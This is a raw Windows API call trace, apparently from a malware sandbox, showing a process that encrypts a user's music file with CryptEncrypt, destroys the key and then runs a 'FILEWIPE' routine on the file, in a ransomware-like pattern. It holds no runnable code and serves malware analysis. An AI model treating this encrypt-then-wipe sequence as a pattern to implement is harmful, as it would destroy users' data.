RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0184.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0184.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0184.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0184.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0184.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0184.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0184.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0184.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0184.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0184.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0184.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0184.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0184.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0184.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0184.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0184.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0184.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0184.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0184.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0184.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0184.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0184.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0184.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0184.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0184.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0184.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0184.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0184.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0184.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0184.786] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0184.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0184.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0184.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0184.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0184.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0184.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0184.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0184.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0184.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0184.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0184.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0184.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0184.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0184.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0184.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0184.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0184.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0184.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0184.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0184.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0184.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0184.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0184.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0184.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0184.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0184.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0184.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0184.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0184.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0184.787] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0184.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0184.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0184.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0184.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0184.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0184.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0184.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0184.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0184.788] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c26e8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c26e8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0184.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0184.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0184.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0184.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0184.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0184.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0184.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0184.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0184.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0184.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0184.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0184.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0184.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0184.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0184.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0184.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0184.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0184.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0184.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0184.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0184.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0184.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0184.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0184.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0184.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0184.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0184.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0184.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0184.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0184.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0184.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0184.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0184.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0184.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0184.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0184.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0184.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0184.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0184.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0184.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0184.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0184.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0184.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0184.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0184.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0184.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0184.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0184.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0184.789] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0184.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0184.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0184.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0184.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0184.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0184.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0184.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0184.790] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0184.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0184.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0184.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0184.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0184.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0184.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0184.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0184.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0184.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0184.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0184.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0184.790] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.790] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.790] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.790] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.790] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.790] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.790] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0184.790] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.791] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.791] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0184.791] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.791] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.791] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0184.791] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0184.791] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0184.791] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.791] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.791] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x10b3f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x10b40) returned 1 [0184.791] CharLowerBuffW (in: lpsz="byte[68417]", cchLength=0xb | out: lpsz="byte[68417]") returned 0xb [0184.792] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.792] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.792] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa6fb50*, pdwDataLen=0x87e820*=0x10b3f, dwBufLen=0x10b40 | out: pbData=0xa6fb50*, pdwDataLen=0x87e820*=0x10b40) returned 1 [0184.793] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0184.793] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0184.793] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.803] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0184.803] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.803] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.803] CryptDestroyKey (hKey=0x90af18) returned 1 [0184.803] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0184.803] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0184.803] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.803] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0184.803] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0184.803] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.803] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.803] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0184.803] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.803] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0184.804] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.804] FreeLibrary (hLibModule=0x74f20000) returned 1 [0184.805] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0184.806] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1f88950, ftCreationTime.dwHighDateTime=0x1d5db3a, ftLastAccessTime.dwLowDateTime=0x15ec7d10, ftLastAccessTime.dwHighDateTime=0x1d5d8e8, ftLastWriteTime.dwLowDateTime=0x15ec7d10, ftLastWriteTime.dwHighDateTime=0x1d5d8e8, nFileSizeHigh=0x0, nFileSizeLow=0x10b3f, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="snzbfu-3Qx.m4a", cAlternateFileName="SNZBFU~1.M4A")) returned 0x90af58 [0184.806] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0184.806] CharLowerBuffW (in: lpsz="byte[68415]", cchLength=0xb | out: lpsz="byte[68415]") returned 0xb [0184.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0184.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0184.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0184.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0184.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0184.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0184.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0184.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0184.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0184.808] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0184.808] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0184.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0184.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0184.808] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0184.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0184.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0184.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0184.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c27c8 [0184.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c27c8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0184.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0184.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0184.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0184.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 